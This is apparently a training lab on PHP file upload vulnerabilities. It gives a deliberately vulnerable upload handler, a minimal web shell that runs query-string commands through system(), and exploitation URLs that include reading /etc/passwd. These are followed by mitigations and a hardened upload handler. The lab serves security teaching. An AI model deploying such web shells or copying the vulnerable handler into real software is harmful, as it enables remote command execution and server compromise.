Objective
Learn how to exploit File Upload Vulnerabilities by uploading malicious scripts (e.g., web shells) to a server and understand secure practices to prevent such attacks.
Scenario
You are assessing a company’s internal web portal that allows employees to upload profile pictures. Due to improper input validation, the upload feature is vulnerable, allowing attackers to upload malicious scripts. Your goal is to exploit this vulnerability by uploading a PHP web shell to achieve remote command execution.
Lab Setup
Prerequisites:
- Basic knowledge of PHP and file handling.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
PHP Script for File Upload
Create a file named upload.php:
<?php
// Deliberately vulnerable handler: the client-supplied filename is used as-is
// and neither the extension nor the file content is checked.
if (isset($_POST['submit'])) {
    $target_dir = "uploads/";
    $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "<h2>The file " . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</h2>";
    } else {
        echo "<h2>Sorry, there was an error uploading your file.</h2>";
    }
}
?>
<form action="" method="POST" enctype="multipart/form-data">
    Select file to upload:
    <input type="file" name="fileToUpload" id="fileToUpload">
    <button type="submit" name="submit">Upload File</button>
</form>
Creating the Upload Directory
In the project root, create a folder named uploads.
Set permissions to allow file uploads (for Linux/Mac):
chmod 777 uploads
Running the Application
Start the Apache server.
Place upload.php in the web server’s root directory (htdocs for XAMPP).
Open http://localhost/upload.php in your browser.
Exploitation Steps
Step 1: Creating a PHP Web Shell
Create a file named shell.php with the following content:
<?php
// Minimal web shell: runs whatever the "cmd" query parameter contains.
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
Step 2: Uploading the Malicious Script
- Open http://localhost/upload.php.
- Upload the shell.php file.
- Navigate to http://localhost/uploads/shell.php?cmd=whoami.
Expected Result:
- The server executes the whoami command and displays the current user.
Step 3: Gaining Full Control
- Execute other commands:
http://localhost/uploads/shell.php?cmd=ls
http://localhost/uploads/shell.php?cmd=cat /etc/passwd
Solution and Prevention
Problem Analysis
- The server allows arbitrary file uploads without validating file types or contents.
Fixing the Vulnerability
Restrict Allowed File Types
Only allow specific file extensions. This check must run before move_uploaded_file(), and it inspects only the last extension, so a name such as shell.php.jpg is reduced to "jpg":
$allowed_types = ['jpg', 'jpeg', 'png', 'gif'];
$file_ext = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
if (!in_array($file_ext, $allowed_types, true)) {
    die("<h2>File type not allowed.</h2>");
}
Validate File Content (MIME Type)
Use mime_content_type() to check the actual file content rather than the client-supplied $_FILES['fileToUpload']['type'], which the attacker controls. Note that this reads only the file's magic bytes, so it must be combined with the other measures below:
$mime_type = mime_content_type($_FILES['fileToUpload']['tmp_name']);
$allowed_mime = ['image/jpeg', 'image/png', 'image/gif'];
if (!in_array($mime_type, $allowed_mime, true)) {
    die("<h2>Invalid file content.</h2>");
}
Rename Uploaded Files
Rename files to prevent executing uploaded scripts:
$new_name = uniqid() . '.' . $file_ext;   // server-chosen name; $file_ext is the validated extension
$target_file = $target_dir . $new_name;
Store Files Outside the Web Root
Move uploads to a non-public directory and access files through a script.
Disable Script Execution in Uploads Folder
For Apache, create an .htaccess file in the uploads/ folder:
php_flag engine off
Options -ExecCGI
AddType text/plain .php .php5 .php7
This requires AllowOverride to permit .htaccess files, and php_flag only takes effect when PHP runs as an Apache module (mod_php); with PHP-FPM the equivalent restriction must be set in the vhost or pool configuration.
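The following is an added example that combines all of the fixes above into one hardened handler; it is not the lab's own upload.php. It assumes PHP 8.0+ with the fileinfo extension, an upload directory /var/www/private_uploads that lies outside the document root (an assumed path), and a download URL of the form /image.php?id=<name> (an assumed name) that calls serve_upload() so the stored bytes are only ever sent as an image.

```php
<?php
// Hardened upload handler (added example, not the lab's upload.php).
// Assumptions: PHP 8.0+, fileinfo extension, UPLOAD_DIR outside the web root.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/private_uploads'; // assumed path, NOT under htdocs
const MAX_BYTES  = 2 * 1024 * 1024;            // 2 MiB cap for profile pictures

// Extension -> the only MIME type accepted for it; both must agree.
const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

// Validate one $_FILES entry. Returns the canonical extension on success,
// or a string starting with "error:" describing why it was rejected.
function validate_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'error: upload failed (code ' . (int)$file['error'] . ')';
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return 'error: not an uploaded file';
    }
    if ($file['size'] > MAX_BYTES) {
        return 'error: file too large';
    }
    // 1. Extension allowlist on the LAST extension only (shell.php.jpg -> "jpg").
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return 'error: extension not allowed';
    }
    // 2. Content check from the temp file's magic bytes; the client-supplied
    //    $file['type'] is attacker-controlled and is never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        return 'error: content does not match extension';
    }
    // 3. The image headers must parse. This is a sanity check only; the
    //    decisive controls are the storage location and serve_upload() below.
    if (@getimagesize($file['tmp_name']) === false) {
        return 'error: not a decodable image';
    }
    return $ext;
}

// Store a validated upload under a server-generated name, outside the web root.
// Returns the generated name, an opaque handle for the application's database.
function store_upload(array $file, string $ext): string
{
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        throw new RuntimeException('upload directory unavailable');
    }
    // Random, attacker-independent name; the original filename never reaches disk.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // never executable, never world-writable
    return $name;
}

// Serve a stored file by its opaque name. The directory is not under the
// document root, so this is the only path to the bytes, and they are always
// sent with a fixed image Content-Type, never handed to the PHP interpreter.
function serve_upload(string $name): void
{
    // Accept only names of the exact shape store_upload() produces (no "../").
    if (!preg_match('/^[a-f0-9]{32}\.(jpe?g|png|gif)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . ALLOWED[pathinfo($name, PATHINFO_EXTENSION)]);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

// Request dispatch: POST from the upload form, GET /image.php?id=<name> (assumed).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['fileToUpload'])) {
    $result = validate_upload($_FILES['fileToUpload']);
    if (str_starts_with($result, 'error:')) {
        http_response_code(400);
        echo '<h2>' . htmlspecialchars($result) . '</h2>';
    } else {
        $stored = store_upload($_FILES['fileToUpload'], $result);
        echo '<h2>Uploaded as ' . htmlspecialchars($stored) . '</h2>';
    }
} elseif (isset($_GET['id'])) {
    serve_upload((string)$_GET['id']);
}
```

Re-running the lab's test against this handler, shell.php is rejected at the extension check, a renamed shell.jpg is rejected at the content check, and even a file that passed both would land outside htdocs under a random name with mode 0640, reachable only through serve_upload(), which sends it as image data.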
Testing After Fix
- Attempt to upload shell.php again.
- Observe that the upload is blocked or the file cannot be executed.
Conclusion
In this lab, you exploited a File Upload Vulnerability to upload a malicious PHP script and execute arbitrary commands. You also explored effective mitigation strategies, including file type validation, content checks, file renaming, and disabling script execution, to secure applications against file upload attacks.